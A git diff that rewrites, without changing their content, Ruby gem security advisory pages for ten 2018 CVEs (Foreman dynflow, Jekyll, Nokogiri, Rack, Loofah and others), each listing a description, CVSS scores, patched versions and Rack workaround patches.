diff --git a/advisories/_posts/2018-09-14-CVE-2018-14643.md b/advisories/_posts/2018-09-14-CVE-2018-14643.md
index 7c4da9b8..2346d8e7 100644
--- a/advisories/_posts/2018-09-14-CVE-2018-14643.md
+++ b/advisories/_posts/2018-09-14-CVE-2018-14643.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2018-14643 (smart_proxy_dynflow): smart_proxy_dynflow gem authentication
-  bypass in Foreman remote execution feature'
-comments: false
-categories:
-- smart_proxy_dynflow
-advisory:
-  gem: smart_proxy_dynflow
-  cve: 2018-14643
-  ghsa: gx5g-xcxj-cx2w
-  url: https://github.com/theforeman/smart_proxy_dynflow/pull/54
-  title: smart_proxy_dynflow gem authentication bypass in Foreman remote execution
-    feature
-  date: 2018-09-14
-  description: |
-    An authentication bypass flaw was found in the smart_proxy_dynflow component
-    used by Foreman. A malicious attacker can use this flaw to remotely execute arbitrary
-    commands on machines managed by vulnerable Foreman instances, in a highly privileged
-    context.
-  cvss_v2: 10.0
-  cvss_v3: 9.8
-  patched_versions:
-  - "~> 0.1.11"
-  - ">= 0.2.1"
----
+---
+layout: advisory
+title: 'CVE-2018-14643 (smart_proxy_dynflow): smart_proxy_dynflow gem authentication
+  bypass in Foreman remote execution feature'
+comments: false
+categories:
+- smart_proxy_dynflow
+advisory:
+  gem: smart_proxy_dynflow
+  cve: 2018-14643
+  ghsa: gx5g-xcxj-cx2w
+  url: https://github.com/theforeman/smart_proxy_dynflow/pull/54
+  title: smart_proxy_dynflow gem authentication bypass in Foreman remote execution
+    feature
+  date: 2018-09-14
+  description: |
+    An authentication bypass flaw was found in the smart_proxy_dynflow component
+    used by Foreman. A malicious attacker can use this flaw to remotely execute arbitrary
+    commands on machines managed by vulnerable Foreman instances, in a highly privileged
+    context.
+  cvss_v2: 10.0
+  cvss_v3: 9.8
+  patched_versions:
+  - "~> 0.1.11"
+  - ">= 0.2.1"
+---
diff --git a/advisories/_posts/2018-09-28-CVE-2018-17567.md b/advisories/_posts/2018-09-28-CVE-2018-17567.md
index fdb79f14..50dacaa1 100644
--- a/advisories/_posts/2018-09-28-CVE-2018-17567.md
+++ b/advisories/_posts/2018-09-28-CVE-2018-17567.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2018-17567 (jekyll): Jekyll _config.yml privilege escalation'
-comments: false
-categories:
-- jekyll
-advisory:
-  gem: jekyll
-  cve: 2018-17567
-  ghsa: 4xjh-m3qx-49wc
-  url: https://jekyllrb.com/news/2018/09/19/security-fixes-for-3-6-3-7-3-8/
-  title: Jekyll _config.yml privilege escalation
-  date: 2018-09-28
-  description: |
-    Jekyll through 3.6.2, 3.7.x through 3.7.3, and 3.8.x through 3.8.3 allows
-    attackers to access arbitrary files by specifying a symlink in the "include" key
-    in the "_config.yml" file.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 3.6.3"
-  - "~> 3.7.4"
-  - ">= 3.8.4"
----
+---
+layout: advisory
+title: 'CVE-2018-17567 (jekyll): Jekyll _config.yml privilege escalation'
+comments: false
+categories:
+- jekyll
+advisory:
+  gem: jekyll
+  cve: 2018-17567
+  ghsa: 4xjh-m3qx-49wc
+  url: https://jekyllrb.com/news/2018/09/19/security-fixes-for-3-6-3-7-3-8/
+  title: Jekyll _config.yml privilege escalation
+  date: 2018-09-28
+  description: |
+    Jekyll through 3.6.2, 3.7.x through 3.7.3, and 3.8.x through 3.8.3 allows
+    attackers to access arbitrary files by specifying a symlink in the "include" key
+    in the "_config.yml" file.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 3.6.3"
+  - "~> 3.7.4"
+  - ">= 3.8.4"
+---
diff --git a/advisories/_posts/2018-10-04-CVE-2018-14404.md b/advisories/_posts/2018-10-04-CVE-2018-14404.md
index 4ff20be4..acd6ca80 100644
--- a/advisories/_posts/2018-10-04-CVE-2018-14404.md
+++ b/advisories/_posts/2018-10-04-CVE-2018-14404.md
@@ -1,78 +1,78 @@
----
-layout: advisory
-title: 'CVE-2018-14404 (nokogiri): Nokogiri gem, via libxml2, is affected by multiple
-  vulnerabilities'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2018-14404
-  ghsa: 6qvp-r6r3-9p7h
-  url: https://github.com/sparklemotion/nokogiri/issues/1785
-  title: Nokogiri gem, via libxml2, is affected by multiple vulnerabilities
-  date: 2018-10-04
-  description: |
-    Nokogiri 1.8.5 has been released.
-
-    This is a security and bugfix release. It addresses two CVEs in upstream
-    libxml2 rated as "medium" by Red Hat, for which details are below.
-
-    If you're using your distro's system libraries, rather than Nokogiri's
-    vendored libraries, there's no security need to upgrade at this time,
-    though you may want to check with your distro whether they've patched this
-    (Canonical has patched Ubuntu packages). Note that these patches are not
-    yet (as of 2018-10-04) in an upstream release of libxml2.
-
-    Full details about the security update are available in Github Issue #1785.
-    [#1785]: https://github.com/sparklemotion/nokogiri/issues/1785
-
-    -----
-
-    [MRI] Pulled in upstream patches from libxml2 that address CVE-2018-14404
-    and CVE-2018-14567. Full details are available in #1785. Note that these
-    patches are not yet (as of 2018-10-04) in an upstream release of libxml2.
-
-    -----
-
-    CVE-2018-14404
-
-    Permalink:
-
-    https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-14404.html
-
-    Description:
-
-    A NULL pointer dereference vulnerability exists in the
-    xpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when
-    parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR
-    case. Applications processing untrusted XSL format inputs with the use of
-    the libxml2 library may be vulnerable to a denial of service attack due
-    to a crash of the application
-
-    Canonical rates this vulnerability as "Priority: Medium"
-
-    -----
-
-    CVE-2018-14567
-
-    Permalink:
-
-    https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-14567.html
-
-    Description:
-
-    infinite loop in LZMA decompression
-
-    Canonical rates this vulnerability as "Priority: Medium"
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.8.5"
-  related:
-    cve:
-    - 2018-14567
-    url:
-    - https://groups.google.com/forum/#!msg/ruby-security-ann/uVrmO2HjqQw/Fw3ocLI0BQAJ
-    - https://gitlab.gnome.org/GNOME/libxml2/commit/a436374994c47b12d5de1b8b1d191a098fa23594
-    - https://gitlab.gnome.org/GNOME/libxml2/commit/2240fbf5912054af025fb6e01e26375100275e74
----
+---
+layout: advisory
+title: 'CVE-2018-14404 (nokogiri): Nokogiri gem, via libxml2, is affected by multiple
+  vulnerabilities'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2018-14404
+  ghsa: 6qvp-r6r3-9p7h
+  url: https://github.com/sparklemotion/nokogiri/issues/1785
+  title: Nokogiri gem, via libxml2, is affected by multiple vulnerabilities
+  date: 2018-10-04
+  description: |
+    Nokogiri 1.8.5 has been released.
+
+    This is a security and bugfix release. It addresses two CVEs in upstream
+    libxml2 rated as "medium" by Red Hat, for which details are below.
+
+    If you're using your distro's system libraries, rather than Nokogiri's
+    vendored libraries, there's no security need to upgrade at this time,
+    though you may want to check with your distro whether they've patched this
+    (Canonical has patched Ubuntu packages). Note that these patches are not
+    yet (as of 2018-10-04) in an upstream release of libxml2.
+
+    Full details about the security update are available in Github Issue #1785.
+    [#1785]: https://github.com/sparklemotion/nokogiri/issues/1785
+
+    -----
+
+    [MRI] Pulled in upstream patches from libxml2 that address CVE-2018-14404
+    and CVE-2018-14567. Full details are available in #1785. Note that these
+    patches are not yet (as of 2018-10-04) in an upstream release of libxml2.
+
+    -----
+
+    CVE-2018-14404
+
+    Permalink:
+
+    https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-14404.html
+
+    Description:
+
+    A NULL pointer dereference vulnerability exists in the
+    xpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when
+    parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR
+    case. Applications processing untrusted XSL format inputs with the use of
+    the libxml2 library may be vulnerable to a denial of service attack due
+    to a crash of the application
+
+    Canonical rates this vulnerability as "Priority: Medium"
+
+    -----
+
+    CVE-2018-14567
+
+    Permalink:
+
+    https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-14567.html
+
+    Description:
+
+    infinite loop in LZMA decompression
+
+    Canonical rates this vulnerability as "Priority: Medium"
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.8.5"
+  related:
+    cve:
+    - 2018-14567
+    url:
+    - https://groups.google.com/forum/#!msg/ruby-security-ann/uVrmO2HjqQw/Fw3ocLI0BQAJ
+    - https://gitlab.gnome.org/GNOME/libxml2/commit/a436374994c47b12d5de1b8b1d191a098fa23594
+    - https://gitlab.gnome.org/GNOME/libxml2/commit/2240fbf5912054af025fb6e01e26375100275e74
+---
diff --git a/advisories/_posts/2018-10-17-CVE-2018-16395.md b/advisories/_posts/2018-10-17-CVE-2018-16395.md
index 5b6d452e..f94fb10c 100644
--- a/advisories/_posts/2018-10-17-CVE-2018-16395.md
+++ b/advisories/_posts/2018-10-17-CVE-2018-16395.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2018-16395 (openssl): Incorrect value comparison in Ruby openssl'
-comments: false
-categories:
-- openssl
-advisory:
-  gem: openssl
-  cve: 2018-16395
-  ghsa: mmrq-6999-72v8
-  url: https://www.ruby-lang.org/en/news/2018/10/17/openssl-x509-name-equality-check-does-not-work-correctly-cve-2018-16395/
-  title: Incorrect value comparison in Ruby openssl
-  date: 2018-10-17
-  description: |
-    An issue was discovered in the OpenSSL library in Ruby when two OpenSSL::X509::Name
-    objects are compared using ==, depending on the ordering, non-equal objects may
-    return true. When the first argument is one character longer than the second, or
-    the second argument contains a character that is one less than a character in the
-    same position of the first argument, the result of == will be true. This could be
-    leveraged to create an illegitimate certificate that may be accepted as legitimate
-    and then used in signing or encryption operations.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 2.1.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-16395
-    - https://www.ruby-lang.org/en/news/2018/10/17/openssl-x509-name-equality-check-does-not-work-correctly-cve-2018-16395/
-    - https://hackerone.com/reports/387250
-    - https://access.redhat.com/errata/RHSA-2018:3729
-    - https://access.redhat.com/errata/RHSA-2018:3730
-    - https://access.redhat.com/errata/RHSA-2018:3731
-    - https://access.redhat.com/errata/RHSA-2018:3738
-    - https://access.redhat.com/errata/RHSA-2019:1948
-    - https://access.redhat.com/errata/RHSA-2019:2565
-    - https://lists.debian.org/debian-lts-announce/2018/10/msg00020.html
-    - https://security.netapp.com/advisory/ntap-20190221-0002/
-    - https://usn.ubuntu.com/3808-1/
-    - https://www.debian.org/security/2018/dsa-4332
-    - https://www.oracle.com/security-alerts/cpujan2020.html
-    - https://www.ruby-lang.org/en/news/2018/10/17/ruby-2-3-8-released/
-    - https://www.ruby-lang.org/en/news/2018/10/17/ruby-2-4-5-released/
-    - https://www.ruby-lang.org/en/news/2018/10/17/ruby-2-5-2-released/
-    - https://www.ruby-lang.org/en/news/2018/11/06/ruby-2-6-0-preview3-released/
-    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
-    - http://www.securitytracker.com/id/1042105
-    - https://github.com/ruby/openssl/commit/f653cfa43f0f20e8c440122ea982382b6228e7f5
-    - https://github.com/advisories/GHSA-mmrq-6999-72v8
----
+---
+layout: advisory
+title: 'CVE-2018-16395 (openssl): Incorrect value comparison in Ruby openssl'
+comments: false
+categories:
+- openssl
+advisory:
+  gem: openssl
+  cve: 2018-16395
+  ghsa: mmrq-6999-72v8
+  url: https://www.ruby-lang.org/en/news/2018/10/17/openssl-x509-name-equality-check-does-not-work-correctly-cve-2018-16395/
+  title: Incorrect value comparison in Ruby openssl
+  date: 2018-10-17
+  description: |
+    An issue was discovered in the OpenSSL library in Ruby when two OpenSSL::X509::Name
+    objects are compared using ==, depending on the ordering, non-equal objects may
+    return true. When the first argument is one character longer than the second, or
+    the second argument contains a character that is one less than a character in the
+    same position of the first argument, the result of == will be true. This could be
+    leveraged to create an illegitimate certificate that may be accepted as legitimate
+    and then used in signing or encryption operations.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 2.1.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-16395
+    - https://www.ruby-lang.org/en/news/2018/10/17/openssl-x509-name-equality-check-does-not-work-correctly-cve-2018-16395/
+    - https://hackerone.com/reports/387250
+    - https://access.redhat.com/errata/RHSA-2018:3729
+    - https://access.redhat.com/errata/RHSA-2018:3730
+    - https://access.redhat.com/errata/RHSA-2018:3731
+    - https://access.redhat.com/errata/RHSA-2018:3738
+    - https://access.redhat.com/errata/RHSA-2019:1948
+    - https://access.redhat.com/errata/RHSA-2019:2565
+    - https://lists.debian.org/debian-lts-announce/2018/10/msg00020.html
+    - https://security.netapp.com/advisory/ntap-20190221-0002/
+    - https://usn.ubuntu.com/3808-1/
+    - https://www.debian.org/security/2018/dsa-4332
+    - https://www.oracle.com/security-alerts/cpujan2020.html
+    - https://www.ruby-lang.org/en/news/2018/10/17/ruby-2-3-8-released/
+    - https://www.ruby-lang.org/en/news/2018/10/17/ruby-2-4-5-released/
+    - https://www.ruby-lang.org/en/news/2018/10/17/ruby-2-5-2-released/
+    - https://www.ruby-lang.org/en/news/2018/11/06/ruby-2-6-0-preview3-released/
+    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
+    - http://www.securitytracker.com/id/1042105
+    - https://github.com/ruby/openssl/commit/f653cfa43f0f20e8c440122ea982382b6228e7f5
+    - https://github.com/advisories/GHSA-mmrq-6999-72v8
+---
diff --git a/advisories/_posts/2018-10-19-CVE-2018-18476.md b/advisories/_posts/2018-10-19-CVE-2018-18476.md
index 2b5e4170..0e4ce83a 100644
--- a/advisories/_posts/2018-10-19-CVE-2018-18476.md
+++ b/advisories/_posts/2018-10-19-CVE-2018-18476.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2018-18476 (mysql-binuuid-rails): mysql-binuuid-rails allows SQL Injection
-  by removing default string escaping'
-comments: false
-categories:
-- mysql-binuuid-rails
-advisory:
-  gem: mysql-binuuid-rails
-  cve: 2018-18476
-  ghsa: 6j63-35hj-vmcg
-  url: https://gist.github.com/viraptor/881276ea61e8d56bac6e28454c79f1e6
-  title: mysql-binuuid-rails allows SQL Injection by removing default string escaping
-  date: 2018-10-19
-  description: |
-    mysql-binuuid-rails 1.1.0 and earlier allows SQL Injection because it removes
-    default string escaping for affected database columns. ActiveRecord does not
-    explicitly escape the Binary data type (Type::Binary::Data) for mysql.
-    mysql-binuuid-rails uses a data type that is derived from the base Binary
-    type, except, it doesn’t convert the value to hex. Instead, it assumes the
-    string value provided is a valid hex string and doesn’t do any checks on it.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.1.1"
-  related:
-    url:
-    - https://github.com/nedap/mysql-binuuid-rails/pull/18
----
+---
+layout: advisory
+title: 'CVE-2018-18476 (mysql-binuuid-rails): mysql-binuuid-rails allows SQL Injection
+  by removing default string escaping'
+comments: false
+categories:
+- mysql-binuuid-rails
+advisory:
+  gem: mysql-binuuid-rails
+  cve: 2018-18476
+  ghsa: 6j63-35hj-vmcg
+  url: https://gist.github.com/viraptor/881276ea61e8d56bac6e28454c79f1e6
+  title: mysql-binuuid-rails allows SQL Injection by removing default string escaping
+  date: 2018-10-19
+  description: |
+    mysql-binuuid-rails 1.1.0 and earlier allows SQL Injection because it removes
+    default string escaping for affected database columns. ActiveRecord does not
+    explicitly escape the Binary data type (Type::Binary::Data) for mysql.
+    mysql-binuuid-rails uses a data type that is derived from the base Binary
+    type, except, it doesn’t convert the value to hex. Instead, it assumes the
+    string value provided is a valid hex string and doesn’t do any checks on it.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.1.1"
+  related:
+    url:
+    - https://github.com/nedap/mysql-binuuid-rails/pull/18
+---
diff --git a/advisories/_posts/2018-10-27-CVE-2018-1000842.md b/advisories/_posts/2018-10-27-CVE-2018-1000842.md
index 22b30788..2435d6dd 100644
--- a/advisories/_posts/2018-10-27-CVE-2018-1000842.md
+++ b/advisories/_posts/2018-10-27-CVE-2018-1000842.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2018-1000842 (fat_free_crm): fat_free_crm gem XSS vulnerability via query
-  parameter'
-comments: false
-categories:
-- fat_free_crm
-advisory:
-  gem: fat_free_crm
-  cve: 2018-1000842
-  ghsa: j5rj-g695-342r
-  url: https://github.com/fatfreecrm/fat_free_crm/wiki/XSS-Vulnerability-%282018-10-27%29
-  title: fat_free_crm gem XSS vulnerability via query parameter
-  date: 2018-10-27
-  description: |
-    FatFreeCRM version <=0.14.1, >=0.15.0 <=0.15.1, >=0.16.0 <=0.16.3, >=0.17.0
-    <=0.17.2, ==0.18.0 contains a Cross Site Scripting (XSS) vulnerability in commit
-    6d60bc8ed010c4eda05d6645c64849f415f68d65 that can result in Javascript execution.
-    This attack appear to be exploitable via Content with Javascript payload will be
-    executed on end user browsers when they visit the page. This vulnerability appears
-    to have been fixed in 0.18.1, 0.17.3, 0.16.4, 0.15.2, 0.14.2.
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 0.18.1"
-  - "~> 0.17.3"
-  - "~> 0.16.4"
-  - "~> 0.15.2"
-  - "~> 0.14.2"
----
+---
+layout: advisory
+title: 'CVE-2018-1000842 (fat_free_crm): fat_free_crm gem XSS vulnerability via query
+  parameter'
+comments: false
+categories:
+- fat_free_crm
+advisory:
+  gem: fat_free_crm
+  cve: 2018-1000842
+  ghsa: j5rj-g695-342r
+  url: https://github.com/fatfreecrm/fat_free_crm/wiki/XSS-Vulnerability-%282018-10-27%29
+  title: fat_free_crm gem XSS vulnerability via query parameter
+  date: 2018-10-27
+  description: |
+    FatFreeCRM version <=0.14.1, >=0.15.0 <=0.15.1, >=0.16.0 <=0.16.3, >=0.17.0
+    <=0.17.2, ==0.18.0 contains a Cross Site Scripting (XSS) vulnerability in commit
+    6d60bc8ed010c4eda05d6645c64849f415f68d65 that can result in Javascript execution.
+    This attack appear to be exploitable via Content with Javascript payload will be
+    executed on end user browsers when they visit the page. This vulnerability appears
+    to have been fixed in 0.18.1, 0.17.3, 0.16.4, 0.15.2, 0.14.2.
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 0.18.1"
+  - "~> 0.17.3"
+  - "~> 0.16.4"
+  - "~> 0.15.2"
+  - "~> 0.14.2"
+---
diff --git a/advisories/_posts/2018-10-30-CVE-2018-16468.md b/advisories/_posts/2018-10-30-CVE-2018-16468.md
index 948eb62d..611d94a8 100644
--- a/advisories/_posts/2018-10-30-CVE-2018-16468.md
+++ b/advisories/_posts/2018-10-30-CVE-2018-16468.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2018-16468 (loofah): Loofah XSS Vulnerability'
-comments: false
-categories:
-- loofah
-advisory:
-  gem: loofah
-  cve: 2018-16468
-  ghsa: g4xq-jx4w-4cjv
-  url: https://github.com/flavorjones/loofah/issues/154
-  title: Loofah XSS Vulnerability
-  date: 2018-10-30
-  description: |
-    In the Loofah gem, through v2.2.2, unsanitized JavaScript may occur in
-    sanitized output when a crafted SVG element is republished.
-  cvss_v3: 6.4
-  patched_versions:
-  - ">= 2.2.3"
-  related:
-    url:
-    - https://hackerone.com/reports/429267
----
+---
+layout: advisory
+title: 'CVE-2018-16468 (loofah): Loofah XSS Vulnerability'
+comments: false
+categories:
+- loofah
+advisory:
+  gem: loofah
+  cve: 2018-16468
+  ghsa: g4xq-jx4w-4cjv
+  url: https://github.com/flavorjones/loofah/issues/154
+  title: Loofah XSS Vulnerability
+  date: 2018-10-30
+  description: |
+    In the Loofah gem, through v2.2.2, unsanitized JavaScript may occur in
+    sanitized output when a crafted SVG element is republished.
+  cvss_v3: 6.4
+  patched_versions:
+  - ">= 2.2.3"
+  related:
+    url:
+    - https://hackerone.com/reports/429267
+---
diff --git a/advisories/_posts/2018-11-05-CVE-2018-16470.md b/advisories/_posts/2018-11-05-CVE-2018-16470.md
index 185b1c23..91c2f127 100644
--- a/advisories/_posts/2018-11-05-CVE-2018-16470.md
+++ b/advisories/_posts/2018-11-05-CVE-2018-16470.md
@@ -1,62 +1,62 @@
----
-layout: advisory
-title: 'CVE-2018-16470 (rack): Possible DoS vulnerability in Rack'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2018-16470
-  ghsa: hg78-4f6x-99wq
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/Dz4sRl-ktKk
-  title: Possible DoS vulnerability in Rack
-  date: 2018-11-05
-  description: |
-    There is a possible DoS vulnerability in the multipart parser in Rack. This
-    vulnerability has been assigned the CVE identifier CVE-2018-16470.
-
-    Versions Affected:  2.0.4, 2.0.5
-    Not affected:       <= 2.0.3
-    Fixed Versions:     2.0.6
-
-    Impact
-    ------
-    There is a possible DoS vulnerability in the multipart parser in Rack.
-    Carefully crafted requests can cause the multipart parser to enter a
-    pathological state, causing the parser to use CPU resources disproportionate to
-    the request size.
-
-    Impacted code can look something like this:
-
-    ```
-    Rack::Request.new(env).params
-    ```
-
-    But any code that uses the multi-part parser may be vulnerable.
-
-    Rack users that have manually adjusted the buffer size in the multipart parser
-    may be vulnerable as well.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Releases
-    --------
-    The 2.0.6 release is available at the normal locations.
-
-    Workarounds
-    -----------
-    To work around this issue, the following code can be used:
-
-    ```
-    require "rack/multipart/parser"
-
-    Rack::Multipart::Parser.send :remove_const, :BUFSIZE
-    Rack::Multipart::Parser.const_set :BUFSIZE, 16384
-    ```
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "<= 2.0.3"
-  patched_versions:
-  - ">= 2.0.6"
----
+---
+layout: advisory
+title: 'CVE-2018-16470 (rack): Possible DoS vulnerability in Rack'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2018-16470
+  ghsa: hg78-4f6x-99wq
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/Dz4sRl-ktKk
+  title: Possible DoS vulnerability in Rack
+  date: 2018-11-05
+  description: |
+    There is a possible DoS vulnerability in the multipart parser in Rack. This
+    vulnerability has been assigned the CVE identifier CVE-2018-16470.
+
+    Versions Affected:  2.0.4, 2.0.5
+    Not affected:       <= 2.0.3
+    Fixed Versions:     2.0.6
+
+    Impact
+    ------
+    There is a possible DoS vulnerability in the multipart parser in Rack.
+    Carefully crafted requests can cause the multipart parser to enter a
+    pathological state, causing the parser to use CPU resources disproportionate to
+    the request size.
+
+    Impacted code can look something like this:
+
+    ```
+    Rack::Request.new(env).params
+    ```
+
+    But any code that uses the multi-part parser may be vulnerable.
+
+    Rack users that have manually adjusted the buffer size in the multipart parser
+    may be vulnerable as well.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Releases
+    --------
+    The 2.0.6 release is available at the normal locations.
+
+    Workarounds
+    -----------
+    To work around this issue, the following code can be used:
+
+    ```
+    require "rack/multipart/parser"
+
+    Rack::Multipart::Parser.send :remove_const, :BUFSIZE
+    Rack::Multipart::Parser.const_set :BUFSIZE, 16384
+    ```
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "<= 2.0.3"
+  patched_versions:
+  - ">= 2.0.6"
+---
diff --git a/advisories/_posts/2018-11-05-CVE-2018-16471.md b/advisories/_posts/2018-11-05-CVE-2018-16471.md
index 1adb3471..7a64185d 100644
--- a/advisories/_posts/2018-11-05-CVE-2018-16471.md
+++ b/advisories/_posts/2018-11-05-CVE-2018-16471.md
@@ -1,87 +1,87 @@
----
-layout: advisory
-title: 'CVE-2018-16471 (rack): Possible XSS vulnerability in Rack'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2018-16471
-  ghsa: 5r2p-j47h-mhpg
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/NAalCee8n6o
-  title: Possible XSS vulnerability in Rack
-  date: 2018-11-05
-  description: |
-    There is a possible vulnerability in Rack. This vulnerability has been
-    assigned the CVE identifier CVE-2018-16471.
-
-    Versions Affected:  All.
-    Not affected:       None.
-    Fixed Versions:     2.0.6, 1.6.11
-
-    Impact
-    ------
-    There is a possible XSS vulnerability in Rack.  Carefully crafted requests can
-    impact the data returned by the `scheme` method on `Rack::Request`.
-    Applications that expect the scheme to be limited to "http" or "https" and do
-    not escape the return value could be vulnerable to an XSS attack.
-
-    Vulnerable code looks something like this:
-
-    ```
-    <%= request.scheme.html_safe %>
-    ```
-
-    Note that applications using the normal escaping mechanisms provided by Rails
-    may not impacted, but applications that bypass the escaping mechanisms, or do
-    not use them may be vulnerable.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Releases
-    --------
-    The 2.0.6 and 1.6.11 releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    The following monkey patch can be applied to work around this issue:
-
-    ```
-    require "rack"
-    require "rack/request"
-
-    class Rack::Request
-    SCHEME_WHITELIST = %w(https http).freeze
-
-    def scheme
-      if get_header(Rack::HTTPS) == 'on'
-        'https'
-      elsif get_header(HTTP_X_FORWARDED_SSL) == 'on'
-        'https'
-      elsif forwarded_scheme
-        forwarded_scheme
-      else
-        get_header(Rack::RACK_URL_SCHEME)
-      end
-    end
-
-    def forwarded_scheme
-      scheme_headers = [
-        get_header(HTTP_X_FORWARDED_SCHEME),
-        get_header(HTTP_X_FORWARDED_PROTO).to_s.split(',')[0]
-      ]
-
-      scheme_headers.each do |header|
-        return header if SCHEME_WHITELIST.include?(header)
-      end
-
-      nil
-    end
-    end
-    ```
-  cvss_v3: 6.1
-  patched_versions:
-  - "~> 1.6.11"
-  - ">= 2.0.6"
----
+---
+layout: advisory
+title: 'CVE-2018-16471 (rack): Possible XSS vulnerability in Rack'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2018-16471
+  ghsa: 5r2p-j47h-mhpg
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/NAalCee8n6o
+  title: Possible XSS vulnerability in Rack
+  date: 2018-11-05
+  description: |
+    There is a possible vulnerability in Rack. This vulnerability has been
+    assigned the CVE identifier CVE-2018-16471.
+
+    Versions Affected:  All.
+    Not affected:       None.
+    Fixed Versions:     2.0.6, 1.6.11
+
+    Impact
+    ------
+    There is a possible XSS vulnerability in Rack.  Carefully crafted requests can
+    impact the data returned by the `scheme` method on `Rack::Request`.
+    Applications that expect the scheme to be limited to "http" or "https" and do
+    not escape the return value could be vulnerable to an XSS attack.
+
+    Vulnerable code looks something like this:
+
+    ```
+    <%= request.scheme.html_safe %>
+    ```
+
+    Note that applications using the normal escaping mechanisms provided by Rails
+    may not impacted, but applications that bypass the escaping mechanisms, or do
+    not use them may be vulnerable.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Releases
+    --------
+    The 2.0.6 and 1.6.11 releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    The following monkey patch can be applied to work around this issue:
+
+    ```
+    require "rack"
+    require "rack/request"
+
+    class Rack::Request
+    SCHEME_WHITELIST = %w(https http).freeze
+
+    def scheme
+      if get_header(Rack::HTTPS) == 'on'
+        'https'
+      elsif get_header(HTTP_X_FORWARDED_SSL) == 'on'
+        'https'
+      elsif forwarded_scheme
+        forwarded_scheme
+      else
+        get_header(Rack::RACK_URL_SCHEME)
+      end
+    end
+
+    def forwarded_scheme
+      scheme_headers = [
+        get_header(HTTP_X_FORWARDED_SCHEME),
+        get_header(HTTP_X_FORWARDED_PROTO).to_s.split(',')[0]
+      ]
+
+      scheme_headers.each do |header|
+        return header if SCHEME_WHITELIST.include?(header)
+      end
+
+      nil
+    end
+    end
+    ```
+  cvss_v3: 6.1
+  patched_versions:
+  - "~> 1.6.11"
+  - ">= 2.0.6"
+---
diff --git a/advisories/_posts/2018-11-09-CVE-2018-1000855.md b/advisories/_posts/2018-11-09-CVE-2018-1000855.md
index 3a4253c3..aa0c8cd2 100644
--- a/advisories/_posts/2018-11-09-CVE-2018-1000855.md
+++ b/advisories/_posts/2018-11-09-CVE-2018-1000855.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2018-1000855 (easymon): Reflected XSS in Firefox in check endpoint'
-comments: false
-categories:
-- easymon
-advisory:
-  gem: easymon
-  cve: 2018-1000855
-  ghsa: c289-47qf-rvrr
-  url: https://github.com/basecamp/easymon/issues/26
-  title: Reflected XSS in Firefox in check endpoint
-  date: 2018-11-09
-  description: |
-    When passing an invalid check name as parameter to the endpoint where
-    the easymon routes are mounted, a 406 response with a body that contains the invalid
-    check name unescaped is returned. Malicious JavaScript can be injected into that
-    invalid name and have it executed in Firefox
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.4.1"
-  related:
-    url:
-    - https://github.com/basecamp/easymon/pull/25
----
+---
+layout: advisory
+title: 'CVE-2018-1000855 (easymon): Reflected XSS in Firefox in check endpoint'
+comments: false
+categories:
+- easymon
+advisory:
+  gem: easymon
+  cve: 2018-1000855
+  ghsa: c289-47qf-rvrr
+  url: https://github.com/basecamp/easymon/issues/26
+  title: Reflected XSS in Firefox in check endpoint
+  date: 2018-11-09
+  description: |
+    When passing an invalid check name as parameter to the endpoint where
+    the easymon routes are mounted, a 406 response with a body that contains the invalid
+    check name unescaped is returned. Malicious JavaScript can be injected into that
+    invalid name and have it executed in Firefox
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.4.1"
+  related:
+    url:
+    - https://github.com/basecamp/easymon/pull/25
+---
